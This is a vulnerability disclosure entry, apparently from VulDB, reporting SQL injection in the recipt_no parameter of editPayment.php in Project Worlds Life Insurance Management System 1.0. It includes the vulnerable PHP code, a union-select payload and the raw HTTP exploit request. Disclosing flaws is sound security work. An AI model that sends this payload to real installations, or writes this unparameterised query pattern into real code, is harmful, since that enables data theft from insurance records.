Gửi #435410: Project Worlds Life Insurance Management System v1.0 SQL Injectionthông tin

tiêu đề	Project Worlds Life Insurance Management System v1.0 SQL Injection
Mô tả	# SQL Injection vulnerability was discovered in Life Insurance Management System(editPayment.php) Official Website: https://projectworlds.in/life-insurance-management-system-in-php/ Version: 1.0 Related Code file: /lims/editPayment.php dbname=lims Payload: /lims/editPayment.php?recipt_no=-1511988103_361528786%27%20union%20select%201,database(),3,4,5,6,7--+ <hr> ```php <?php include'connection.php'; $id = ""; if($_SERVER["REQUEST_METHOD"] == "GET"){ $recipt_no = $_GET["recipt_no"]; } $sql = "SELECT recipt_no, client_id, month, amount, due, fine, agent_id from payment where recipt_no='$recipt_no'"; $result = $conn->query($sql); echo "<div>\n"; echo '<form action="updatePayment.php" method="post">'; while($row = $result->fetch_assoc()) { echo "<label for=\"fname\">RECIPT NO</label>"; echo "<input type=\"text\" recipt_no=\"fname\" name=\"recipt_no\" placeholder=\"Your recpit no..\" value=\"$row[recipt_no]\">"; echo "<label for=\"fname\">CLIENT ID</label>"; echo "<input type=\"text\" recipt_no=\"fname\" name=\"client_id\" placeholder=\"Client Id..\" value=\"$row[client_id]\">"; echo "<label for=\"fname\">MONTH</label>"; echo "<input type=\"text\" recipt_no=\"fname\" name=\"month\" placeholder=\"Month..\" value=\"$row[month]\">"; echo "<label for=\"fname\">AMOUNT</label>"; echo "<input type=\"text\" recipt_no=\"fname\" name=\"amount\" placeholder=\"Amount..\" value=\"$row[amount]\">"; echo "<label for=\"fname\">DUE</label>"; echo "<input type=\"text\" recipt_no=\"fname\" name=\"due\" placeholder=\"Your Due..\" value=\"$row[due]\">"; echo "<label for=\"fname\">FINE</label>"; echo "<input type=\"text\" recipt_no=\"fname\" name=\"fine\" placeholder=\"Fine..\" value=\"$row[fine]\">"; echo "<label for=\"fname\">AGENT ID</label>"; echo "<input type=\"text\" recipt_no=\"fname\" name=\"agent_id\" placeholder=\"Agent Id..\" value=\"$row[agent_id]\">"; } echo "<input type=\"submit\" value=\"UPDATE\">"; echo "</form>\n"; echo "<a href='deletePayment.php?recipt_no=".$recipt_no."'>Delete Payment</a>"; echo "</div>\n"; echo "\n"; ?> ``` The id variable is directly inserted into the SQL query without any escaping or parameterization. An attacker could inject malicious SQL code by manipulating the id field. in (line number 88-135 of ) Injection parameter: recipt_no ``` GET /lims/editPayment.php?recipt_no=-1511988103_361528786%27%20union%20select%201,database(),3,4,5,6,7--+ HTTP/1.1 Host: 192.168.1.18 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Cookie: PHPSESSID=m36in4a8ui1q6k23afkenkqivk Connection: close ``` ![image](https://github.com/user-attachments/assets/84ad2cc6-395f-4204-862b-9e58c4458b47)
Nguồn	⚠️ https://github.com/peteryang520/Cve-report/blob/main/SQLi-1.md
Người dùng	Hantao Yang (UID 76989)
Đệ trình	01/11/2024 10:13 (cách đây 1 Năm)
Kiểm duyệt	02/11/2024 19:09 (1 day later)
Trạng thái	được chấp nhận
Mục VulDB	282903 [Project Worlds Life Insurance Management System 1.0 /editPayment.php recipt_no Tiêm SQL]
điểm	20

◂ Trước Tổng Quan Tiếp theo ▸